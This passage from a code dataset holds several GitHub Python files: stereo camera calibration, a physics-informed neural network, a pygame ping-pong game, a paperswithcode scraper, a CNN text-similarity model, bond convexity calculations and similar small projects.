cv2.imshow('R_cam', gray_R_s)\n cv2.moveWindow(\"L_cam\", 100, 400)\n cv2.moveWindow(\"R_cam\",800,400)\n key = cv2.waitKey(50)\n if key == 27:\n break\n elif key == 13:\n # press enter\n L_save = L_path + '/{:04d}.jpg'\n R_save = R_path + '/{:04d}.jpg'\n cv2.imwrite(L_save.format(frameId), gray_L)\n cv2.imwrite(R_save.format(frameId), gray_R)\n print(\"Image pair {0} saved.\".format(frameId))\n frameId += 1\n\n elif status == \"calibrate\":\n # refer: https://albertarmea.com/post/opencv-stereo-camera/\n\n TERMINATION_CRITERIA = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n OPTIMIZE_ALPHA = 0\n\n outputFile = '/home/pi/Desktop/PyCharm/Cam_coefficients.npz'\n leftCamCali = '/home/pi/Desktop/PyCharm/L_Cam_Matrix.npz'\n rightCamCali = '/home/pi/Desktop/PyCharm/R_Cam_Matrix.npz'\n\n (leftFilenames, leftObjectPoints, leftImagePoints, leftSize) = Find_chessboard_single(L_path)\n (rightFilenames, rightObjectPoints, rightImagePoints, rightSize ) = Find_chessboard_single(R_path)\n\n if leftSize != rightSize:\n print(\"Camera resolutions do not match\")\n sys.exit(1)\n imageSize = leftSize\n\n print(\"Choose {0} images to do calibration\".format(MAX_IMAGES))\n filenames = list(set(leftFilenames) & set(rightFilenames))\n if (len(filenames) > MAX_IMAGES):\n print(\"Too many images to calibrate, using {0} randomly selected images\"\n .format(MAX_IMAGES))\n filenames = random.sample(filenames, MAX_IMAGES)\n filenames = sorted(filenames)\n print(\"Using these images:\")\n print(filenames)\n\n leftObjectPoints, leftImagePoints = Get_require_points(filenames,\n leftFilenames, leftObjectPoints, leftImagePoints)\n rightObjectPoints, rightImagePoints = Get_require_points(filenames,\n rightFilenames, rightObjectPoints, rightImagePoints)\n\n # objectPoints = leftObjectPoints\n objectPoints = rightObjectPoints\n\n try:\n cache_L = np.load(leftCamCali)\n print(\"Loading left calibration data from cache file at {0}\".format(leftCamCali))\n cache_R = np.load(rightCamCali)\n print(\"Loading left calibration data from cache file at {0}\".format(rightCamCali))\n\n leftCameraMatrix = cache_L[\"leftCameraMatrix\"]\n leftDistortionCoefficients = cache_L[\"leftDistortionCoefficients\"]\n rightCameraMatrix = cache_R[\"rightCameraMatrix\"]\n rightDistortionCoefficients = cache_R[\"rightDistortionCoefficients\"]\n except IOError:\n print(\"Cache file at {0} not found\".format(leftCamCali))\n print(\"Cache file at {0} not found\".format(rightCamCali))\n\n print(\"Calibrating left camera...\")\n _, leftCameraMatrix, leftDistortionCoefficients, _, _ = cv2.calibrateCamera(\n objectPoints, leftImagePoints, imageSize, None, None)\n print(\"Caching left camera matrix... \")\n np.savez_compressed(leftCamCali, leftCameraMatrix=leftCameraMatrix,\n leftDistortionCoefficients=leftDistortionCoefficients)\n\n print(\"Calibrating right camera...\")\n _, rightCameraMatrix, rightDistortionCoefficients, _, _ = cv2.calibrateCamera(\n objectPoints, rightImagePoints, imageSize, None, None)\n print(\"Caching right camera matrix... \")\n np.savez_compressed(rightCamCali, rightCameraMatrix=rightCameraMatrix,\n rightDistortionCoefficients=rightDistortionCoefficients)\n\n\n # print(\"Calibration test... \")\n # Test_calibration(leftCameraMatrix, leftDistortionCoefficients, L_path)\n # Test_calibration(rightCameraMatrix, rightDistortionCoefficients, R_path)\n\n print(\"Calibrating cameras together...\")\n (_, _, _, _, _, rotationMatrix, translationVector, _, _) = cv2.stereoCalibrate(\n objectPoints, leftImagePoints, rightImagePoints,\n leftCameraMatrix, leftDistortionCoefficients,\n rightCameraMatrix, rightDistortionCoefficients,\n imageSize, None, None, None, None,\n cv2.CALIB_FIX_INTRINSIC, TERMINATION_CRITERIA)\n\n print(\"Rectifying cameras...\")\n (leftRectification, rightRectification, leftProjection, rightProjection,\n dispartityToDepthMap, leftROI, rightROI) = cv2.stereoRectify(\n leftCameraMatrix, leftDistortionCoefficients,\n rightCameraMatrix, rightDistortionCoefficients,\n imageSize, rotationMatrix, translationVector,\n None, None, None, None, None,\n cv2.CALIB_ZERO_DISPARITY, OPTIMIZE_ALPHA)\n\n print(\"Saving calibration...\")\n leftMapX, leftMapY = cv2.initUndistortRectifyMap(\n leftCameraMatrix, leftDistortionCoefficients, leftRectification,\n leftProjection, imageSize, cv2.CV_32FC1)\n rightMapX, rightMapY = cv2.initUndistortRectifyMap(\n rightCameraMatrix, rightDistortionCoefficients, rightRectification,\n rightProjection, imageSize, cv2.CV_32FC1)\n\n np.savez_compressed(outputFile, imageSize=imageSize,\n leftMapX=leftMapX, leftMapY=leftMapY, leftROI=leftROI,\n rightMapX=rightMapX, rightMapY=rightMapY, rightROI=rightROI,\n dispartityToDepthMap=dispartityToDepthMap)\n\n cv2.destroyAllWindows()\n\nmain()","repo_name":"karex27/collision_avoidance","sub_path":"calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":10904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"24523610627","text":"import tensorflow as tf\nimport keras\n\n\nclass PhysicsInformedNN(keras.Model):\n def __init__(self, Re, Sc, hidden_units, x_test, loss_fn, data_loss_w=100, training_metrics=[],\n evaluation_metrics=[]):\n super(PhysicsInformedNN, self).__init__()\n ##Reynold number and Schmidt number\n self.data_loss_w = data_loss_w\n self.loss_fn = loss_fn\n self.Re = Re\n self.Sc = Sc\n self.ReSc = self.Re * self.Sc\n self.training_metrics = training_metrics\n self.evaluation_metrics = evaluation_metrics\n self.list_layers = [tf.keras.layers.Dense(hidden_units[0], activation='swish', input_shape=[x_test.shape[1]])] + \\\n [tf.keras.layers.Dense(hidden_unit,activation='swish') for hidden_unit in hidden_units] + \\\n [tf.keras.layers.Dense(4)]\n self.model_eqns = tf.keras.Sequential(self.list_layers)\n test = self.model_eqns(x_test)\n\n def __call__(self, inputs,training=True):\n pred = self.model_eqns(inputs, training=training)\n rho, u, v, p = [tf.reshape(pred[:, i], (-1, 1)) for i in range(4)]\n return rho, u, v, p\n\n def train_step(self, data):\n x_train, y_train = data\n\n # unpack x_train in x,y,t\n x, y, t = [tf.reshape(x_train[:, i], (-1, 1)) for i in range(3)]\n # data obs for rho and data obs for the equations\n rho_train, y_eqns = [tf.reshape(y_train[:, i], (-1, 1)) for i in range(2)]\n\n with tf.GradientTape() as tape:\n with tf.GradientTape(persistent=True) as t2:\n t2.watch(x)\n t2.watch(y)\n t2.watch(t)\n with tf.GradientTape(persistent=True) as t1:\n t1.watch(x)\n t1.watch(y)\n t1.watch(t)\n X = tf.stack([x[:, 0], y[:, 0], t[:, 0]], axis=1)\n rho, u, v, p = self(X)\n\n ##rho 1st derivatives\n rho_x, rho_y, rho_t = [t1.gradient(rho, var) for var in [x, y, t]]\n ##u 1st derivatives\n u_x, u_y, u_t = [t1.gradient(u, var) for var in [x, y, t]]\n ##v 1st derivatives\n v_x, v_y, v_t = [t1.gradient(v, var) for var in [x, y, t]]\n ##p 1st derivatives\n p_x, p_y = [t1.gradient(p, var) for var in [x, y]]\n ##second derivatoves\n rho_xx, rho_yy, u_xx, u_yy, v_xx, v_yy = [t2.gradient(*ij) for ij in\n zip([rho_x, rho_y, u_x, u_y, v_x, v_y], [x, y] * 3)]\n\n e1 = (u_t + u * u_x + v * u_y) + p_x - (1 / self.Re) * (u_xx + u_yy)\n e2 = (v_t + u * v_x + v * v_y) + p_y - (1 / self.Re) * (v_xx + v_yy) + rho\n e3 = u_x + v_y\n e4 = rho_t + u * rho_x + v * rho_y - (1 / self.ReSc) * (rho_xx + rho_yy)\n\n square_eqns = [tf.square(e_i) for e_i in [e1, e2, e3, e4]]\n\n square_data = tf.square(rho - rho_train)\n\n for e_i, metric in zip([square_data, e1, e2, e3, e4], self.training_metrics):\n metric.update_state(e_i, y_eqns)\n\n loss_eqns = self.loss_fn(tf.reduce_sum(square_eqns), y_eqns)\n loss_obs = self.loss_fn(square_data, y_eqns)\n loss = self.data_loss_w * loss_obs + loss_eqns\n\n gradients = tape.gradient(loss, self.trainable_variables)\n self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))\n metrics = self.training_metrics\n return {m.name: m.result() for m in metrics}\n\n def test_step(self, data):\n x, y = data\n\n rho_valid, u_valid, v_valid = [tf.reshape(y[:, i], (-1, 1)) for i in range(3)]\n\n # Compute predictions\n rho_pred, u_pred, v_pred, p_pred = self(x, training=False)\n\n for metric, valid, pred in zip(self.evaluation_metrics, [rho_valid, u_valid, v_valid],\n [rho_pred, u_pred, v_pred]):\n metric.update_state(valid, pred)\n\n # Updates the metrics tracking the loss\n\n metrics = self.evaluation_metrics\n\n return {m.name: m.result() for m in metrics}\n","repo_name":"Micka-ui/PINN_2DGC","sub_path":"PhysicsInformedNN.py","file_name":"PhysicsInformedNN.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"43447241395","text":"import numpy as np\nimport torch.nn as nn\nfrom torch import Tensor\nfrom torch.distributions.beta import Beta\nfrom torch.optim import Adam\n\nfrom agentRL import BetaAgent\nfrom nation import Nation\nfrom replayBuffer import replayBuffer\n\n\nclass NationRL(BetaAgent, Nation):\n\n def __init__(\n self,\n config_par,\n contact_matrix,\n cont_param,\n population,\n C,\n name,\n state,\n parameters,\n ):\n\n BetaAgent.__init__(self, config_par=config_par, name=name)\n\n Nation.__init__(\n self,\n config_par,\n contact_matrix,\n cont_param,\n population,\n C,\n name,\n state,\n parameters,\n )\n\n # Give experience to agent\n\n def extract_state(self, state_info):\n return state_info.SEAIRDV.flatten().astype(float)\n\n def policy(self):\n return BetaAgent.policy(self)[0]\n","repo_name":"FrancescaPerin/Covid-first-trial","sub_path":"src/code/nationRL.py","file_name":"nationRL.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"21324286025","text":"import random\n\nimport pygame\n\npygame.init()\nWIDTH = 500\nHEIGHT = 500\nBACKGROUND_COLOUR = (41, 36, 33)\nINTERFACE_COLOUR = (41, 36, 33)\nBUTTON_COLOUR = (100, 100, 100)\nBUTTON_TEXT_COLOUR = (255, 235, 205)\nWHITE = (255, 255, 255)\n#create a game window with a specific width and height\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n#create a name for the window\npygame.display.set_caption(\"plan pingpong\")\n#define clock\nclock = pygame.time.Clock()\n\nRACKET_IMG = pygame.image.load(\"racket.png\")\nBALL_IMG = pygame.image.load(\"ball.png\")\n\nclass Button:\n\n def __init__(self, position, text, colour, size = (200, 50)):\n #draw the rectangle as the button\n rect_x, rect_y = position\n rectangle = pygame.Rect(position, size)\n self.rect = rectangle\n pygame.draw.rect(screen, colour, rectangle)\n #draw text on the button\n font = pygame.font.Font(None, 70)\n content = font.render(text, True, BUTTON_TEXT_COLOUR)\n screen.blit(content, position)\n\n def click(self, position):\n return self.rect.collidepoint(position)\n\n\ndef startInterface():\n clock = pygame.time.Clock()\n while True:\n screen.fill(INTERFACE_COLOUR)\n button_1 = Button((150, 175), '1 Player', BUTTON_COLOUR)\n button_2 = Button((150, 275), '2 Player', BUTTON_COLOUR)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if button_1.click(pygame.mouse.get_pos()):\n return 1\n elif button_2.click(pygame.mouse.get_pos()):\n return 2\n clock.tick(10)\n pygame.display.update()\n\ndef endInterface(left_score, right_score):\n font1 = pygame.font.Font(None, 50)\n font2 = pygame.font.Font(None, 30)\n text1 = 'Player on left won!' if left_score > right_score else 'Player on right won!'\n text2 = 'Press ESCAPE to quit.'\n text3 = 'Press ENTER to continue or play again.'\n\n text1 = font1.render(text1, True, WHITE)\n text2 = font2.render(text2, True, WHITE)\n text3 = font2.render(text3, True, WHITE)\n\n rect1 = text1.get_rect()\n rect2 = text2.get_rect()\n rect3 = text3.get_rect()\n rect1.center = ((WIDTH//2, HEIGHT//2-100))\n rect2.center = ((WIDTH//2, HEIGHT//2+50))\n rect3.center = ((WIDTH//2, HEIGHT//2+100))\n while True:\n screen.fill(BACKGROUND_COLOUR)\n screen.blit(text1, rect1)\n screen.blit(text2, rect2)\n screen.blit(text3, rect3)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n return\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n return\n elif event.key == pygame.K_ESCAPE:\n pygame.quit()\n\n\n pygame.display.update()\n\nclass Racket(pygame.sprite.Sprite):\n def __init__(self, image, type, speed):\n super().__init__()\n self.image = RACKET_IMG\n self.type = type\n self.rect = self.image.get_rect()\n self.speed = speed\n\n def move(self, direction):\n if direction == \"UP\":\n self.rect.top = self.rect.top - self.speed\n self.rect.top = max(self.rect.top, 0)\n if direction== \"DOWN\":\n self.rect.bottom = self.rect.bottom + self.speed\n self.rect.bottom = min(self.rect.bottom, HEIGHT)\n\n def automove(self, ball):\n if ball.rect.centery > self.rect.centery:\n self.move(\"DOWN\")\n if ball.rect.centery < self.rect.centery:\n self.move(\"UP\")\n\n\n def reset(self):\n if self.type == \"RIGHT\":\n self.rect.right = WIDTH\n else:\n self.rect.left = 0\n self.rect.centery = HEIGHT//2\n\n def draw(self):\n screen.blit(self.image, self.rect)\n\nclass Ball(pygame.sprite.Sprite):\n def __init__(self, image, speed):\n super().__init__()\n self.image = image\n self.rect = image.get_rect()\n self.speed = speed\n\n def move(self, right_racket, left_racket, left_score, right_score):\n self.rect.centerx = self.rect.centerx + self.speed * self.directrion_x\n self.rect.centery = self.rect.centery + self.speed * self.directrion_y\n\n if pygame.sprite.collide_rect(self, right_racket) or pygame.sprite.collide_rect(self, left_racket):\n self.directrion_x = -self.directrion_x\n self.directrion_y = random.choice([1, -1])\n self.speed +=1\n elif self.rect.top < 0:\n self.directrion_y = 1\n\n elif self.rect.bottom > HEIGHT:\n self.directrion_y = -1\n\n elif self.rect.left < 0:\n self.reset()\n left_racket.reset()\n right_racket.reset()\n right_score +=1\n\n elif self.rect.right > WIDTH:\n self.reset()\n left_racket.reset()\n right_racket.reset()\n left_score +=1\n return left_score, right_score\n def reset(self):\n self.rect.centerx = WIDTH//2\n self.rect.centery = random.randrange(self.rect.height//2, HEIGHT - self.rect.height//2)\n self.directrion_x = random.choice([-1, 1])\n self.directrion_y = random.choice([-1, 1])\n self.speed = 1\n\n def draw(self):\n screen.blit(self.image, self.rect)\n\n\n\nfont = pygame.font.Font(None, 50)\nrunning = True\ngame_mode = startInterface()\nright_racket = Racket(RACKET_IMG, \"RIGHT\", 5)\nright_racket.reset()\nleft_racket = Racket(RACKET_IMG, \"LEFT\", 5)\nleft_racket.reset()\nball = Ball(BALL_IMG, 1)\nball.reset()\nleft_score = 0\nright_score = 0\nwhile running:\n clock.tick(60)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n screen.fill(BACKGROUND_COLOUR)\n\n pressed_keys = pygame.key.get_pressed()\n if pressed_keys[pygame.K_UP]:\n right_racket.move('UP')\n elif pressed_keys[pygame.K_DOWN]:\n right_racket.move('DOWN')\n if game_mode == 2:\n if pressed_keys[pygame.K_w]:\n left_racket.move('UP')\n elif pressed_keys[pygame.K_s]:\n left_racket.move('DOWN')\n else:\n left_racket.automove(ball)\n\n pygame.draw.rect(screen, WHITE, (247, 0, 6, 500))\n right_racket.draw()\n left_racket.draw()\n left_score, right_score = ball.move(right_racket, left_racket, left_score, right_score)\n ball.draw()\n\n screen.blit(font.render(str(left_score), False, WHITE), (150, 10))\n screen.blit(font.render(str(right_score), False, WHITE), (300, 10))\n if left_score == 11 or right_score == 11:\n break\n pygame.display.update()\n\nendInterface(left_score, right_score)\npygame.quit()\n\n","repo_name":"JunhongC-coder/pygame-collection","sub_path":"pingpong/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":6744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"3414048080","text":"\"\"\"\nInside kaggle_titanic_deploy folder, run: python src/train_model.py\n\"\"\"\nimport pandas as pd\nimport pickle\nfrom sklearn.linear_model import LogisticRegression\nfrom feature_engineering_pipeline import FeatureEngineering\n\n\ndef main():\n train = pd.read_csv('data/train.csv')\n X_train = train.drop(['Survived'], axis=1)\n y_train = train['Survived']\n\n X_test = pd.read_csv('data/test.csv')\n\n features = ['Pclass', 'Age', 'Sex', 'Fare']\n X_train = X_train[features]\n X_test = X_test[features]\n\n feature_engineering_pipeline = FeatureEngineering().get_pipeline()\n X_train = feature_engineering_pipeline.fit_transform(X_train)\n\n X_test = feature_engineering_pipeline.transform(X_test)\n\n X_train.to_csv('data/train_after_feature_engineering.csv', index=False)\n X_test.to_csv('data/test_after_feature_engineering.csv', index=False)\n\n model = LogisticRegression()\n\n model.fit(X_train, y_train)\n\n with open('models/model.pkl', 'wb') as pickle_file:\n pickle.dump(model, pickle_file)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"vivianyamassaki/kaggle_titanic_deploy","sub_path":"src/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"86"} +{"seq_id":"70925466204","text":"import argparse\nimport json\nimport sys\nfrom selenium import webdriver\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\n\ndef find_github_link(article_title):\n info_dict = {}\n info_dict['Acticle_title'] = article_title\n chrome_options = Options()\n chrome_options.add_argument('--headless=new')\n driver = webdriver.Chrome(options=chrome_options)\n # driver = webdriver.Chrome()\n \n driver.get(\"https://paperswithcode.com/\")\n search_box = driver.find_element(\"name\", \"q\")\n search_box.send_keys(f\"{article_title}\")\n search_box.submit()\n current_url = driver.current_url\n driver.get(current_url)\n sub_tags = driver.find_element(By.XPATH, \"/html/body/div[3]/div[2]\").find_elements(By.XPATH, \"./*\")\n if len(sub_tags) > 0:\n info_dict['status'] = \"OK\"\n code_url = sub_tags[0].find_element(By.XPATH, \"/html/body/div[3]/div[2]/div[1]/div[2]/div/div[2]/div[2]/a[2]\").get_attribute(\"href\")\n driver.get(code_url)\n list_code_link = driver.find_element(\"id\", \"implementations-short-list\").find_elements(By.XPATH, \"./*\")\n if len(list_code_link) > 0:\n lst_github = []\n top_code_link = list_code_link if len(list_code_link) < 5 else list_code_link[:5]\n for code_link in top_code_link:\n github_url = code_link.find_element(By.CLASS_NAME, \"code-table-link\").get_attribute(\"href\")\n lst_github.append(github_url)\n info_dict['Github'] = lst_github\n else:\n info_dict['Github'] = \"No code\"\n else:\n info_dict['status'] = \"Paper not found\"\n driver.quit()\n return info_dict\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--name\", help=\"Paper title\", required=True)\n args = parser.parse_args()\n \n article_name = args.name\n github_link = find_github_link(article_name)\n\n if github_link['status'] == 'OK':\n print(f\"Found paper: \\n{json.dumps(github_link, indent = 4)}\")\n else:\n print(f\"{json.dumps(github_link, indent = 4)}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pdthuc/Github-Crawler","sub_path":"find_github.py","file_name":"find_github.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"10105848104","text":"\"\"\"\nFaça um programa que pergunte a hora ao usuário e, baseando-se no horário \ndescrito, exiba a saudação apropriada. Ex. \nBom dia 0-11, Boa tarde 12-17 e Boa noite 18-23.\n\"\"\"\n\nhora = input(\"Digite a hora atual (formato 24 horas): \")\n\ntry:\n hora = int(hora)\n if hora >= 0 and hora <= 11:\n print(\"Bom dia!\")\n elif hora >= 12 and hora <= 17:\n print(\"Boa tarde!\")\n elif hora >= 18 and hora <= 23:\n print(\"Boa noite!\")\n else:\n print(\"Hora inválida. Insira um valor entre 0 e 23.\")\nexcept ValueError:\n print(\"Valor inválido. Insira um número inteiro entre 0 e 23.\")\n","repo_name":"aleyssongarcia/Python-aulas","sub_path":"Aula_27.py","file_name":"Aula_27.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"15218997465","text":"import mysql.connector\n\ndb = mysql.connector.connect(\n host=\"127.0.0.1\",\n user=\"root\",\n password=\"F3bru@ry!234\",\n database=\"Assessment\"\n)\ncursor = db.cursor()\n\n\nprint(\"\\n\")\nprint(\"Current Database\")\ncursor.execute(\"SHOW DATABASES LIKE 'A%';\")\n\n\nfor Database in cursor:\n print(Database)\n\nprint(\"\\n\")\nprint(\"Current Tables\")\n\ncursor.execute(\"SHOW TABLES;\")\n\nfor Tables in cursor:\n print(Tables)\n\n\ncursor.execute(\"DROP TABLE IF EXISTS BOM_BKP\")\ncursor.execute(\"CREATE TABLE BOM_BKP SELECT * FROM BOM\")\n\n\nprint(\"\\n\")\nprint(\"Current Database\")\ncursor.execute(\"SHOW DATABASES LIKE 'A%';\")\n\n\nfor Database in cursor:\n print(Database)\n\nprint(\"\\n\")\nprint(\"Updated list of Tables\")\n\ncursor.execute(\"SHOW TABLES;\")\n\nfor Tables in cursor:\n print(Tables)\n","repo_name":"reynaldo-roberto/Assessment","sub_path":"For Submission/Python Scripts/add_table_backup.py","file_name":"add_table_backup.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"1172019103","text":"from yt.testing import *\nfrom yt.utilities.answer_testing.framework import \\\n requires_ds, \\\n data_dir_load\nfrom yt.frontends.gadget.api import GadgetHDF5Dataset\n\nisothermal = \"IsothermalCollapse/snap_505.hdf5\"\n@requires_file(isothermal)\ndef test_GadgetDataset():\n kwargs = dict(bounding_box=[[-3,3], [-3,3], [-3,3]])\n assert isinstance(data_dir_load(isothermal, kwargs=kwargs),\n GadgetHDF5Dataset)\n","repo_name":"danielgrassinger/yt_new_frontend","sub_path":"yt/frontends/gadget/tests/test_outputs.py","file_name":"test_outputs.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"11229993718","text":"import torch\nimport torch.nn as nn\nfrom torch import Tensor\nfrom torch import optim\nimport torch.nn.functional as F\nfrom dprint import dprint\n\n\nclass CNN_Text(nn.Module):\n def __init__(self, V, D):\n super(CNN_Text, self).__init__()\n\n Ci = 1\n Co = 100\n Ks = [3, 4, 5]\n C = 50\n\n self.convs1 = nn.ModuleList([nn.Conv2d(Ci, Co, (K, D)) for K in Ks])\n self.dropout = nn.Dropout(0.5)\n self.fc1 = nn.Linear(len(Ks)*Co, 1)\n\n def forward(self, x):\n x = x.unsqueeze(1) # (N, Ci, W, D)\n # dprint('after unsqueeze(1) = {}'.format(x.size()), color='red')\n\n # y = self.convs1[0](x)\n # dprint('conv(x) = {}'.format(y.size()), color='red')\n\n x = [F.relu(conv(x)).squeeze(3) for conv in self.convs1] # [(N, Co, W), ...]*len(Ks)\n # dprint('conv(x).squeeze(3) = {}'.format(x[0].size()), color='red')\n\n x = [F.max_pool1d(i, i.size(2)).squeeze(2) for i in x] # [(N, Co), ...]*len(Ks)\n # dprint('max_pool1d(i, i.size(2)).squeeze(2) = {}'.format(x[0].size()), color='red')\n\n x = torch.cat(x, 1)\n\n dropout_x = self.dropout(x) # (N, len(Ks)*Co)\n \n logit = self.fc1(dropout_x) # (N, C)\n\n return logit\n\n\nclass Manhattan_CNN(nn.Module):\n def __init__(self, data_name, hidden_size, embedding, use_embedding=False, train_embedding=True):\n super(Manhattan_CNN, self).__init__()\n self.data_name = data_name\n self.use_cuda = torch.cuda.is_available()\n self.hidden_size = hidden_size\n\n if use_embedding:\n self.embedding = nn.Embedding(embedding.shape[0], embedding.shape[1])\n self.embedding.weight = nn.Parameter(embedding)\n self.input_size = embedding.shape[1] # V - Size of embedding vector\n\n else:\n self.embedding = nn.Embedding(embedding[0], embedding[1])\n self.input_size = embedding[1]\n\n self.embedding.weight.requires_grad = train_embedding\n\n self.cnn_1 = CNN_Text(self.input_size, self.hidden_size)\n self.cnn_2 = CNN_Text(self.input_size, self.hidden_size)\n\n def exponent_neg_manhattan_distance(self, x1, x2):\n ''' Helper function for the similarity estimate of the LSTMs outputs '''\n return torch.exp(-torch.sum(torch.abs(x1 - x2), dim=1))\n\n def forward(self, input):\n '''\n input -> (2 x Max. Sequence Length (per batch) x Batch Size)\n '''\n # dprint('input[0] = {}'.format(input[0].size()), color='red')\n # dprint('input[1] = {}'.format(input[1].size()), color='red')\n\n embedded_1 = self.embedding(input[0]) # L, B, V\n embedded_2 = self.embedding(input[1]) # L, B, V\n embedded_1 = embedded_1.permute(1, 0, 2)\n embedded_2 = embedded_2.permute(1, 0, 2)\n\n # dprint('embedded_1 = {}'.format(embedded_1.size()), color='red')\n # dprint('embedded_2 = {}'.format(embedded_2.size()), color='red')\n\n encoded_1 = self.cnn_1(embedded_1)\n encoded_2 = self.cnn_2(embedded_2)\n\n similarity_scores = self.exponent_neg_manhattan_distance(encoded_1, encoded_2)\n\n if self.data_name == 'sick': return similarity_scores*5.0\n else: return similarity_scores\n\n def init_weights(self):\n ''' Initialize weights of cnn 1 '''\n for name_1, param_1 in self.cnn_1.named_parameters():\n if 'bias' in name_1:\n nn.init.constant_(param_1, 0.0)\n elif 'weight' in name_1:\n nn.init.xavier_normal_(param_1)\n\n ''' Set weights of cnn 2 identical to cnn 1 '''\n cnn_1 = self.cnn_1.state_dict()\n cnn_2 = self.cnn_2.state_dict()\n\n for name_1, param_1 in cnn_1.items():\n # Backwards compatibility for serialized parameters.\n if isinstance(param_1, torch.nn.Parameter):\n param_1 = param_1.data\n\n cnn_2[name_1].copy_(param_1)\n","repo_name":"hexists/study_sentence_embedding","sub_path":"manhattan_model/manhattan_cnn.py","file_name":"manhattan_cnn.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"5504404043","text":"import numpy_financial as npf\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# 30 year bond, coupon rate, 3.5%, yield 5%\n\n#calculate duration\nprice = -npf.pv(0.05,30,3.5,100)\nprice_up = -npf.pv(0.06,30,3.5,100)\nprice_down = -npf.pv(0.04,30,3.5,100)\n\nduration = (price_down-price_up)/(2*price*0.01)\n\ndollar_duration = duration*price*0.01\n\ndv01 = duration*price*0.0001\n\n#calculate convexity\n\nconvexity = (price_down+price_up-(2*price))/(price*0.01**2)\n\n#high maturity, low coupon, low yield result in highest convexity\n\ndollar_convexity = convexity*price*(0.01**2)\n\nconvexity_adjustment = 0.5 * dollar_convexity * (100**2) * (0.01**2)\n\n# combine duration and convexity to preduct bond price change, convexity adjustment helps capture the curvature of the bond price/yield relationship\n\ncombined_prediction = -100*dollar_duration*0.01 + convexity_adjustment\n\n\n\n#determining bond convexity w/ various yields ->as yield increases, convexity decreases\n\nbond_yields = np.arange(0,20,0.1)\nbond = pd.DataFrame(bond_yields, columns=['bond_yield'])\nbond['price'] = -npf.pv((bond['bond_yield']/100),30,3.5,100) #actual bond price for each level of yield\nbond['price_up'] = -npf.pv((bond['bond_yield']/100)+0.01,30,3.5,100)\nbond['price_down'] = -npf.pv((bond['bond_yield']/100)-0.01,30,3.5,100)\nbond['convexity'] = (bond['price_down'] + bond['price_up'] - 2 * bond['price']) / (bond['price'] * 0.01 ** 2)\n\nprint(bond)\nplt.plot(bond['bond_yield'],bond['convexity'])\nplt.xlabel('Yield (%)')\nplt.ylabel('Convexity')\nplt.show()\n","repo_name":"gastrader/bond_pricing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"28900635943","text":"import sys\nimport re\nimport inspect\n\n\ndef get_func_schema(function: callable) -> dict:\n \"\"\"\n Return the data schema of a function.\n {\n \"function\": function,\n \"description\": \"function description\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"parameter_a\": {\n \"type\": \"str\",\n \"description\": \"parameter_a description\"\n },\n \"parameter_b\": {\n \"type\": \"int\",\n \"description\": \"parameter_b description\"\n },\n \"parameter_c\": {\n \"type\": \"str\",\n \"description\": \"parameter_c description\",\n \"enum\": [\"a\", \"b\", \"c\"]\n },\n },\n \"required\": [\"parameter_a\", \"parameter_b\"]\n }\n }\n \"\"\"\n func_doc = function.__doc__\n # Google Style Docstring\n if func_doc is None:\n raise Exception(\"Function {} has no docstring.\".format(function.__name__))\n func_doc = func_doc.strip().replace(' ','').replace('\\t', '')\n # extract doc of args from docstring\n doc_spt = func_doc.split('\\n\\n')\n desc = doc_spt[0]\n args = doc_spt[1] if len(doc_spt) > 1 else \"\"\n returns = doc_spt[2] if len(doc_spt) > 2 else \"\"\n\n # extract args\n # delete the first line of args\n arg_lines = args.split('\\n')[1:]\n arg_doc_list = re.findall(r'(\\w+)(\\((\\w+)\\))?:\\s*(.*)', args)\n args_doc = {}\n for arg_line in arg_lines:\n doc_tuple = re.findall(r'(\\w+)(\\(([\\w\\[\\]]+)\\))?:\\s*(.*)', arg_line)\n if len(doc_tuple) == 0:\n continue\n args_doc[doc_tuple[0][0]] = doc_tuple[0][3]\n\n # extract returns\n return_doc_list = re.findall(r'(\\w+):\\s*(.*)', returns)\n\n params = enumerate(inspect.signature(function).parameters.values())\n parameters = {\n \"type\": \"object\",\n \"required\": [],\n \"properties\": {},\n }\n\n\n for 